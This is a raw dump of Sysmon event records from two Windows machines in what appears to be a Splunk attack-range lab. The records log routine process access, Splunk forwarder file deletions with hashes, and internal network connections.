10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1172-6216-0C05-000000003802}5320C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1172-6216-0C05-000000003802}5320C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+e8fd|c:\windows\system32\UBPM.dll+e14a|c:\windows\system32\UBPM.dll+dda2|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:26.059{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:27.934{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51990EF36AE6AFF349E28C87CFAD9564,SHA256=8751044EB71743F06149FB0958D52DAB83A9A7E39B860404D188575F135C81A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:27.457{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD42F48EBCE41AD259B0CA5C4371BEA5,SHA256=B2542C45E0FF3E2195285F20FAEBA18CF33B332D6D17F8E796DD38FE513F1822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:27.324{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EE119DE0E7AC2F47FB69C1858C000A20,SHA256=5E2B9855EB24C1585290B44556294AE4758968599A12F4A31491FF0C9BDB8213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:27.324{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A421D277A740EC4776AC29737807999E,SHA256=7A19460016553F71C3AA02E63F61887695A515574CF11195DEDCCAA4129AA557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:28.949{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D07966CA88A977813EA3D76E64B199E,SHA256=FABA672B482F90821FD813E671F473CE6369D305621752CB43199E6CB3DA4462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:28.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9E7162236B6763FDA3A0F6DD8B910C,SHA256=B2051DB0A531705FF21C51F2CE6D026B584C6E40D9CD33600372897BAFA371AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:25.719{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53436-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:29.965{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26EC369AB8E14BB12E7876F1DC731EF,SHA256=BD0CF69C47D418A532A138AE50B236461EDDCB9EAEA20365E84C214511FC541A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:29.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52220DC04F003747AB4966D95E3E3A9A,SHA256=45478AA6201F53A00DA9EBAECB60F3CDD11512A5B125FD41A36FCE92EF01E622,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:27.618{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51337-false10.0.1.12-8000- 23542300x8000000000000000216580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:30.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3592147DF45E67186B3D7645056DA68A,SHA256=2D335F13B83AE3990619094527014DB185CB9D159857077664512CA5A407009E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:30.285{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=59EAC5B0D66C9428368A176361ABBBEC,SHA256=6785B3D6054E88ADAB55B951C1C7F8E3AFDE19F12E0A44D61B42B06962FC6EE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:31.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8B5A0ED11549A590C9B40A906847E96,SHA256=3FD7A639960034F44C4CDB3FF20963D1A32FBCEAE4D2E7AA82A60A719E9DC587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:30.996{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0354D5A6C2FC5BA8FE5004F3A1858EAC,SHA256=BEC771FD5E7314FD7E75DDA757D2895424A9E71D8FA3FC9D242C4E7D202052C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:32.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B610F3F36E71E9CF98BC6DD6A5876CA,SHA256=3EDB80DA33E81FC46A7F61E1CD00A75DDB08CBCCC64D099FDC694847443BCE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:32.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F121A8D0FC90D8DBF3914641DB1466,SHA256=290C3A85E330798FDDC646A3B3ECFC0CBFB9E5253BE5C668AA4F44C29B0F506B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:33.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25A46286359362120490066AF2A16E35,SHA256=C3B4538540887E6A5A18E2B15D76344AEEB340DC0321828FC27E8E3E2BB5C39D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:33.340{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=995387765F1A0B2AF76B6FB981A74400,SHA256=32E304EE39F6B99F8646A5DC3F48AAD885BADE1F0C628455DF3897B211951597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:33.027{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B109C8F07038F707B004C5F2D8D009F,SHA256=9178D0856ECDA34516C3572AECA17EAFA8BEFA052017817931905331F6BFDBDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:31.516{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53437-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:34.058{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D1062E19B7E07EA530DC1A33599EE3,SHA256=E3819E62BF5C0DCEECEBE7260BB364A68D59B3A38B3CB423679835225C61D6A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:35.121{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71567077363051CA2D851EA4F654029,SHA256=BE0E457AFB91D3FE22C7639C905E3393F310C81E729630C3018957857F013E7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:33.618{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51338-false10.0.1.12-8000- 23542300x8000000000000000216585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:35.020{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BBB4D926CC837DD19E30F21B3AD3018,SHA256=598E6F77C6712591A7DB6FA9826D46FB0C6B669EC268D95480B88A6E529EB092,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:36.137{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7CC2402C3BD21F2DBA6C263F808B351,SHA256=D6ABE054725146A5CB52B73C5DA1374441E1F8335F9014FFF56246B9C12927CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:36.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D8E8307A3D66CE7CC8EC76FE8A32041,SHA256=5B11369169BABA6283D5449F5FEAE01358D86338CD18322FB55949432184B8F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:37.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3A4F29B8F083664CDE64882317FC92,SHA256=98D8632E62EF5B509ACB03530D8C92C2923F51B5893EEB4BD4036D3B26EE0E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:37.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06EF2CAD3E6AA80B32493E5BF6438346,SHA256=44C5F49415A9FDF72EF65619A816818609B08A1CC1CC57E97B441752C1526D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:38.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69DCC8FDFC401CA1C8B14BF5580DE54B,SHA256=3AB833C0F058304929DE50DC662043C07B521BA5A65C3DBA30E24EE0B2A88A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:38.316{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BACB7CC659F0C236F9FF58ABF75CFC6,SHA256=26466615ED1D8BB4DD6C07409D7A303CF8462D224C5018A4FE4FE41563E33982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:39.332{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62BDA80C0CECCAE3B927B13584D7F9B0,SHA256=526822AC62743DEEC38260A756F14AD32D41ACE276F8F10967A06D5EFC88BA4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:39.777{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:36.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53438-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:39.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B4605F9A5C4880F95A8421F1F96D0C,SHA256=3260BD885357495253DFB818B66B34DC4D17CFADCC1BE8F4F24B18FA4E0EFDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:40.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A455C2ABC33DFC2C3246E133B3177B51,SHA256=5B094725D11810B80B3D91D242EAD5F5A407D7F02D41799E609F6258E07B1BE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:40.808{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:40.246{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF5ADB75E7B458162494B8C4AD0DD5BC,SHA256=CDFE42DE1CDAF181E7CBA0FFBB94C9EF8ADE60A7976B424A1D1C5E92AF4B3EAB,IMPHASH=00000000000000000000000000000000falsetrue 